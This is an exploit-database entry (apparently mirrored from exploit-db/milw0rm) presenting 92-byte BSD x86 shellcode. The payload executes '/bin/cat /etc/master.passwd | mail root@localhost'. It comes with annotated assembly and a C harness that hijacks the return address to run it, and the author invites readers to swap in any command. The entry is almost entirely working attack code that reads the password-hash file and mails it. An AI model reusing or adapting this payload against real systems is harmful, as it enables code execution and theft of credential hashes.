BSD/x86 – execve(/bin/cat /etc/master.passwd) | mail root@localhost Shellcode (92 bytes)


Vulnerability ID: 1054683
Vulnerability type:
Published: 2004-09-26
Updated: 2004-09-26
CVE ID: N/A
CNNVD-ID: N/A
Platform: BSD_x86
CVSS score: N/A
|Source
https://www.exploit-db.com/exploits/13255
|Details
Vulnerability details have not yet been disclosed
|Exploit
/*
   *BSD version
   FreeBSD, OpenBSD, NetBSD.

   [email protected]

   92 bytes.

   _execve(/bin/sh -c "/bin/cat /etc/master.passwd|mail root@localhost");
   You can replace the command with whatever you like.
*/

#include <stdio.h>

char shellcode[]=

    "\xeb\x25"             /* jmp     <shellcode+39>         */
    "\x59"                 /* popl    %ecx                   */
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x68\x6e\x2f\x73\x68" /* push    $0x68732f6e            */
    "\x68\x2f\x2f\x62\x69" /* push    $0x69622f2f            */
    "\x89\xe3"             /* movl    %esp,%ebx              */
    "\x50"                 /* pushl   %eax                   */
    "\x66\x68\x2d\x63"     /* pushw   $0x632d                */
    "\x89\xe7"             /* movl    %esp,%edi              */
    "\x50"                 /* pushl   %eax                   */
    "\x51"                 /* pushl   %ecx                   */
    "\x57"                 /* pushl   %edi                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x89\xe7"             /* movl    %esp,%edi              */
    "\x50"                 /* pushl   %eax                   */
    "\x57"                 /* pushl   %edi                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x50"                 /* pushl   %eax                   */
    "\xb0\x3b"             /* movb    $0x3b,%al  (SYS_execve = 59 on BSD) */
    "\xcd\x80"             /* int     $0x80                  */
    "\xe8\xd6\xff\xff\xff" /* call    <shellcode+2>          */
    "/bin/cat /etc/master.passwd|mail root@localhost";

int main(void)
{
   int *ret;
   /* sizeof counts the terminating NUL of the command string */
   printf("Shellcode length=%d\n",(int)sizeof(shellcode));
   /* test harness: overwrite main's saved return address (32-bit x86 stack layout) */
   ret=(int*)&ret+2;
   (*ret)=(int)shellcode;
   return 0;
}

// milw0rm.com [2004-09-26]
